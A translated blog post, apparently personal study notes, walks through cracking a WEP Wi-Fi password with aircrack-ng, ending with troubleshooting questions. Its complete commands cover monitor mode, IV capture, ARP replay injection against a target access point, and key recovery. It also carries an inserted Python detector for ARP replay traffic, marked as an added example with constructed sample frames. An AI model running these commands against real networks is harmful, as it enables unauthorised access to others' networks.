Recently, I came across some wireless technical materials by chance and found a fast Wi-Fi penetration method. Although this method is not as stable as Reaver, I personally think it is much faster than Reaver. The reason may be that the notebook used for the experiment is too old. I ran into several problems along the way; if any colleagues know the answers, please give me some advice. Here I will first record the main commands as a memo.
If the environment is BT5, a higher version is installed by default, so you do not need to upgrade it, but the installation commands are attached here for reference:
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf <name of source file>
cd aircrack-ng-xxx
make
make install
The following uses WEP encryption as an example:
Check the wireless network card. The default is wlan0. If an external network card or another wireless network card exists, select and enable the corresponding card.
View the wireless network card information: iwconfig
Enable the wireless NIC: ifconfig wlan0 up
Put the NIC into monitor mode:
airmon-ng start wlan0
Scan wireless network information at the current location:
airodump-ng mon0
Start capturing packets and save them to a file with the .ivs suffix and the prefix longas; 6 is the AP channel.
airodump-ng --ivs -w longas -c 6 wlan0
While the preceding command is running, open a new terminal window and enter the following command to launch an ARP request injection attack on the target AP. This method reads ARP request packets, forges a large number of them and resends them, which stimulates the AP to generate more packets and thus speeds up the cracking process.
aireplay-ng -3 -b <AP MAC> -h <client MAC> mon0
When the number of IVs reaches 20 thousand or above, try the following command to crack:
aircrack-ng <captured IVS file>
After a successful crack, KEY FOUND! is displayed. The ASCII string that follows it is the password.
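The ARP request injection step above leaves a recognizable trace on the air: one station resends the same encrypted broadcast frame, with the same WEP IV, at a high rate. The following detector is an added example (not from the original post); the record layout, the one-second window, the threshold and all sample frames are constructed assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_arp_replay(frames, window=1.0, threshold=20):
    """Return {(bssid, src): peak_count} for sources that resend one
    WEP-encrypted broadcast frame (same IV and length) more than
    `threshold` times within `window` seconds."""
    recent = defaultdict(deque)   # (bssid, src, iv, length) -> timestamps
    alerts = {}
    for ts, bssid, src, dst, iv, length in sorted(frames):
        if dst != BROADCAST:
            continue              # ARP requests are sent to broadcast
        q = recent[(bssid, src, iv, length)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold:
            key = (bssid, src)
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

def sample_frames():
    """Constructed capture metadata: (time, bssid, src, dst, WEP IV, length)."""
    ap = "00:11:22:33:44:55"
    normal = "aa:aa:aa:aa:aa:01"
    replayer = "aa:aa:aa:aa:aa:02"
    frames = []
    # Normal client: an occasional broadcast ARP, fresh IV each time.
    for i in range(10):
        frames.append((i * 3.0, ap, normal, BROADCAST, f"{i:06x}", 68))
    # Replay: one captured frame resent 500 times in about a second, same IV.
    for i in range(500):
        frames.append((10.0 + i * 0.002, ap, replayer, BROADCAST, "a1b2c3", 68))
    # Unicast traffic is ignored by the detector.
    for i in range(100):
        frames.append((12.0 + i * 0.001, ap, normal, ap, "ffffff", 1500))
    return frames

if __name__ == "__main__":
    for (bssid, src), peak in detect_arp_replay(sample_frames()).items():
        print(f"possible ARP replay on {bssid} from {src}: "
              f"{peak} identical frames within the window")
```

Ordinary 802.11 retransmissions also repeat an IV, but only a handful of times per frame, which is why the threshold is set well above that.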
PS:
Question 1:
When you enter airodump-ng --ivs -w longas -c 6 wlan0 in the new window, an error is returned:
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
Sysfs injection support was not found either.
The method I tried is to use the commands:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0
sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0
Then it works.
Question 2:
When running aireplay-ng -3 -b <AP MAC> -h <client MAC> mon0, an error occurs:
Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Because this command does not directly affect the results, I have not found a proper solution for the moment. If you have a good solution, please advise.
Here, we only briefly list the main commands used. They are only for lab reference and cannot be used for illegal operations. Otherwise, the consequences will be borne by you.
This article is from the "ice Chen Sub" blog; please be sure to keep this source: http://icecrown.blog.51cto.com/6667141/1558511
Some study notes and questions about aircrack-ng